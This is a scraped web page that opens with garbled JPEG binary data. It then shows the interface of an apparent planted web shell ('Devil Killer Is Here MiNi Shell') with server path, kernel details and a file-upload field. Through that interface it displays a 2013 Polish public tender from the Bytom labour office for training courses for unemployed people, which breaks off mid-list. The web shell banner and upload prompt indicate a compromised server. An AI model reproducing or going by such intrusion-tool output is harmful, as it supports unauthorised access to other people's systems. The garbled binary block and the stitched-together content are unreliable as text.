JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130318/106336-N-2013.html

<p class="kh_header"><b>Bytom: Szkolenia osób bezrobotnych, 
w podziale na X  części  finansowane ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 106336 - 2013; data zamieszczenia: 18.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Łagiewnicka 15, 41-902 Bytom, woj. śląskie, tel. 032 2813307, 2817019, 2818860, faks 032 2818860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupbytom.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna samorządu terytorialnego. Powiatowy Urząd Pracy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia osób bezrobotnych, 
w podziale na X  części  finansowane ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są szkolenia osób bezrobotnych zarejestrowanych                                 w Powiatowym Urzędzie Pracy w Bytomiu w podziale na  X części. 
Szkolenia winny odbywać się na terenie Bytomia lub w innej miejscowości, przy czym łączny czas dojazdu z centrum Bytomia do miejsca odbywania szkolenia i z powrotem środkami transportu zbiorowego nie może przekraczać 3 godzin. 
Koszt dojazdu do miejsca odbywania szkolenia i z powrotem pokrywa uczestnik szkolenia. 
Koszt wszystkich egzaminów jest częścią składową kosztu szkolenia i winien być podany                   w preliminarzu.
Zajęcia winny odbywać się codziennie, wyłącznie od poniedziałku do piątku, w godzinach przedpołudniowych lub popołudniowych. (zaczynać się nie wcześniej niż o godz. 8:00 kończyć nie później niż  o godzinie 19:00), w formie kursu, realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 25 godz. zegarowych w tygodniu.
Wykonawca winien posiadać zaktualizowany na 2013 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia                      i instytucjach rynku pracy (jt. Dz. U. z 2008 r. Nr 69, poz. 415 ze zm.).
Zamawiający skieruje osoby bezrobotne, zakwalifikowane na dane szkolenie, na badania lekarskie i psychologiczne określone w programie szkolenia we własnym zakresie i na własny koszt.
Ilość godzin podana w ofercie winna obejmować egzaminy końcowe     i cząstkowe. Koszt wszystkich egzaminów jest częścią składową kosztu szkolenia i winien być podany w preliminarzu - zał. nr 1.
Wszyscy uczestnicy otrzymają materiały szkoleniowe w postaci pendrivów min. 2GB                          oraz podręczników i, jeżeli to będzie niezbędne, skryptów lub opracowań własnych wykładowców oraz materiałów piśmiennych - /zeszyt min. 60-cio kartkowy i długopis/ .
Podręczniki winny być dostarczone uczestnikom, najpóźniej na drugich zajęciach.
Wykonawca winien zapewnić  materiały niezbędne do realizacji zajęć praktycznych, w ilości umożliwiającej skorzystanie z nich wszystkim uczestnikom szkolenia, w sposób umożliwiający pełną realizację programu. 
Wszyscy uczestnicy otrzymają w trakcie zajęć poczęstunek w postaci mieszanych, drobnych art. spożywczych (np. paluszki, krakersy, kruche ciasteczka itp.) w ilości min. 50g dziennie na osobę, kawy i herbaty ( w ilości pozwalającej przygotować min. dwie filiżanki dziennie na osobę ), dodatku do kawy i herbaty (cukier, mleko lub zabielacz do kawy) - w ilościach nieograniczonych, oraz zimnego napoju (sok lub woda mineralna - min. 0,5 litra na osobę dziennie), a także jeden ciepły posiłek obiadowy dziennie. Zamawiający nie dopuszcza podawania ciepłego posiłku w formie dań typu fast food i gotowych zup typu instant. 
Zamawiający nie wyraża zgody na łączenie grup..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.53.31.00-0, 80.53.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku (dotyczy wszystkich części):

Wykonawca winien posiadać zaktualizowany na 2013 rok wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, stosownie do treści art. 20 ust. 1 ustawy z dnia 20.04.2004 r. o promocji zatrudnienia i instytucjach rynku pracy (jt. Dz. U. z 2008 r. Nr 69, poz. 415).
Ponadto:

Dotyczy części I: wykonawca winien posiadać pisemne potwierdzenie Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego wymagań określonych w Rozporządzeniu Ministra Gospodarki z dnia 20.09.2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych                       i drogowych (Dz. U nr 118 poz.1263 z 2001 r.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca winien zapewnić uczestnikom szkolenia warunki do nauki z uwzględnieniem zasad BHP oraz wyposażeniem stosownym do potrzeb grupy słuchaczy.

Wykonawca winien wykazać, iż w celu realizacji nin. zamówienia dysponuje lub będzie dysponował lokalem obejmującym co najmniej:
a) salę wykładową min. 2 m2 powierzchni sali wykładowej na jednego kursanta, posiadającą oświetlenie dzienne z możliwością zaciemnienia w postaci
     zasłon, rolet czy żaluzji oraz oświetlenie sztuczne,
b) odpowiednio wyposażone pomieszczenie/a do przeprowadzenia zajęć praktycznych
    zgodnie z tematyką prowadzonego szkolenia,
      c)   WC,
      d)   pomieszczenie umożliwiające przygotowanie ciepłych i zimnych napoi i spożycie posiłku, wyposażone w czajnik, naczynia, sztućce - zwane w skrócie jadalnią 
oraz wskazać podstawę dysponowania powyższym zasobem.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca jest zobowiązany wykazać, iż posiada aktualne, opłacone ubezpieczenie                 od odpowiedzialności cywilnej z tytułu prowadzonej działalności związanej                                z przedmiotem zamówienia, co najmniej na kwotę 10 000,00 zł.

W przypadku rozłożenia składki ubezpieczeniowej na raty, Zamawiający uzna spełnienie warunku w przypadku, gdy na dzień składania ofert opłacona została część wymagalnej składki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Program szkolenia - załącznik nr 5 do SIWZ</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - posiadanie certyfikatu jakości usług - 15</li>
<li>3 - miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, za     wyjątkiem możliwości i warunków dokonania takiej zmiany określonych poniżej:
- zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów,
- zmiana terminu wykonania zamówienia będąca następstwem okoliczności, których nie można było wcześniej przewidzieć i nie można jej przypisać Wykonawcy, w tym w przypadku przedłużającej się procedury przetargowej, jeżeli do wykonania zamówienia pozostało mniej niż 2 miesiące od dnia zawarcia umowy, o ten okres,
- zmiany osób, które będą uczestniczyć w wykonywaniu zamówienia,
- zmiany ilości uczestników szkolenia, będącej następstwem okoliczności, których nie można było przewidzieć.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupbytom.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urzad Pracy w Bytomiu
ul. Łagiewnicka 15
41-902 Bytom
pok. 62.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2013 godzina 09:00, miejsce: Powiatowy Urzad Pracy w Bytomiu
ul. Łagiewnicka 15
41-902 Bytom
pok. 20 (Biuro Podawcze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Europejskiego Funduszu Społecznego. Poddziałanie 6.1.3. PO KL w ramach projektu GOTOWI DO PRACY..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CZĘŚĆ I :

Operator koparkoładowarki kl. III ze wstępnym stażem pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba godzin na szkoleniu musi wynosić min. 202 i zawierać następujące przedmioty nauczania:

1.Użytkowanie eksploatacyjne; 
2.Dokumentacja techniczna;
3.BHP; 
4.Podstawy elektrotechniki;
5.Silniki spalinowe;
6.Elementy hydrauliki; 
7.Budowa koparko - ładowarki;
8.Technologia robót;
9.Zajęcia praktyczne.
Zamówienie obejmuje przeszkolenie łącznie 20 osób, w dwóch grupach i realizowane będzie w terminie podanym przez Zamawiającego, od podpisania umowy  do  31 października  2013 r.
Uczestnicy szkolenia nie mogą mieć więcej niż 8 godzin zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II obejmuje następujące szkolenia:

1. Spawacz ręczny łukiem elektrycznym met. MAG (135).
2. Spawacz ręczny łukiem elektrycznym met. TIG (141).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.Spawacz ręczny łukiem elektrycznym met. MAG (135).

Liczba godzin na szkoleniu musi wynosić min. 184 i zawierać następujące przedmioty nauczania:
1.Zagadnienia z zakresu procesów spawalniczych, 
2.Technika spawania;
3.Technologia spawania;
4.Urządzenia i materiały do spawania

Program zgodny z wytycznymi Instytutu Spawalnictwa, poszerzony przez jednostkę szkoleniową o dodatkowe godziny zajęć praktycznych. Dotyczy spawania blach i rur spoinami pachwinowymi.

Absolwenci uzyskają uprawnienia wydane przez Instytut Spawalnictwa.

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa i realizowane będzie                   w terminie wskazanym przez Zamawiającego - od podpisania umowy                                                do 31 października 2013 r. 
Uczestnicy nie mogą mieć więcej niż 8 godz. zajęć dziennie.
II. Spawacz ręczny łukiem elektrycznym met. TIG (141)

Liczba godzin na szkoleniu musi wynosić min. 136 i następujące przedmioty nauczania:
1.Zagadnienia z zakresu procesów spawalniczych;
2.Technika spawania;
3.Technologia spawania;
4.Urządzenia i materiały do spawania.
Program zgodny z wytycznymi Instytutu Spawalnictwa, poszerzony przez jednostkę szkoleniową o dodatkowe godziny zajęć praktycznych. Dotyczy spawania blach i rur spoinami pachwinowymi.

Absolwenci uzyskają uprawnienia wydane przez Instytut Spawalnictwa.

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa i realizowane będzie   w terminie wskazanym przez Zamawiającego - od podpisania umowy     do 31 października 2013 r. 
Uczestnicy nie mogą mieć więcej niż 8 godz. zajęć dziennie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III obejmuje następujące szkolenia:

1. Portier konserwator
2. Technolog robót wykończeniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Portier konserwator

Liczba godzin na szkoleniu musi wynosić min. 350 godz. i zawierać następujące przedmioty nauczania:

1.	Elementy elektryki - drobne prace przy instalacji niskiego napięcia;  
2.	Elementy hydrauliki; 
3.	Konserwacja i utrzymanie dobrego stanu urządzeń technicznych - malowanie, uzupełnianie ubytków w glazurze i powierzchniach płaskich i perforowanych, zbijanie starego tynku, wyrównywanie podłoża, drobne naprawy ślusarskie, szklenie, drobne prace stolarskie; 
4.	Utrzymanie porządku we wnętrzu budynku;
5.	Podstawowe zagadnienia ochrony osób i mienia;
6.	Konserwacja terenów zielonych - wykaszarki, wycinarki, nożyce do żywopłotu, kosiarki, opryskiwacze;
7.	Prace przy pomocy elektronarzędzi;
8.	Uprawnienia palacza CO, na paliwa stałe, ciekłe i gazowe.

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa i realizowane będzie                  w terminie podanym przez Zamawiającego, od podpisania umowy                                               do 31 października 2013  r.
Uczestnicy nie mogą mieć więcej niż 8 godz. zajęć dziennie.
II. Technolog robót wykończeniowych

Liczba godzin na szkoleniu musi wynosić min. 300 i zawierające następujące przedmioty nauczania:

1.	BHP na placu budowlowy;
2.	Prace z zastosowaniem płyt gipsowo-kartonowych;
3.	Montaż sufitów podwieszanych i ścianek działowych;
4.	Posadzki z płyt ceramicznych i granitowo-marmurowych;
5.	Wykończeniowe prace podłogowe;
6.	Malowanie dekoracyjne;
7.	Prace murarskie;
8.	Glazura ścienna; 
9.	Tynki szlachetne;
10.	Kalkulacja i obmiar robót;
11.	Pierwsza pomoc przedlekarska.

Zamówienie obejmuje łącznie 10 osób - jedna grupa  i  realizowane będzie w terminie wskazanym przez Zamawiającego - od podpisania umowy do 31 października 2013 r.
Uczestnicy nie mogą mieć więcej niż 8 godz. zajęć dziennie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. posiadanie certyfikatu jakości usług - 15</li>
<li>3. miejsce odbywania wszystkich zajęć w ramach szkolenia na terenie Bytomia - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV obejmuje następujące szkolenia:

1.	Fryzjer
2. Manicure - pedicure.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	Fryzjer

Liczba godzin na szkoleniu musi wynosić min. 260 i zawierać następujące przedmioty nauczania:

1.	Higiena - budowa i rodzaje włosów, choroby włosów i skóry, barwnik włosa, pielęgnacja włosów;
2.	Technologia fryzjerska - podstawowe narzędzia fryzjerskie, przygotowanie stanowiska pracy, perukarstwo, zagęszczanie i przedłużanie włosów, strzyżenie damskie w kompakcie, technika efiliacji, technika strzyżeń męskich, , dobieranie fryzury do kształtu głowy i twarzy, trwała ondulacja, prostowanie włosów, koloryzacja (farbowanie, rozjaśnianie i tonowanie włosów), dekoloryzacja, balejaże - różne rodzaje;
3.	Materiały fryzjerskie;
4.	Stylizacja;
5.	Zajęcia praktyczne.

Zamówienie obejmuje przeszkolenie łącznie 10 osób - jedna grupa, realizowane będzie                    w terminie wskazanym przez Zamawiającego od podpisania umowy do 31 października 2013 r. 
II. Manicure - pedicure 

Liczba godzin na szkoleniu musi wynosić min. 200 i zawierać następujące przedmioty nauczania:
1.	Anatomia dłoni i stopy;
2.	Dermatologiczne schorzenie dłoni, stóp, paznokci;
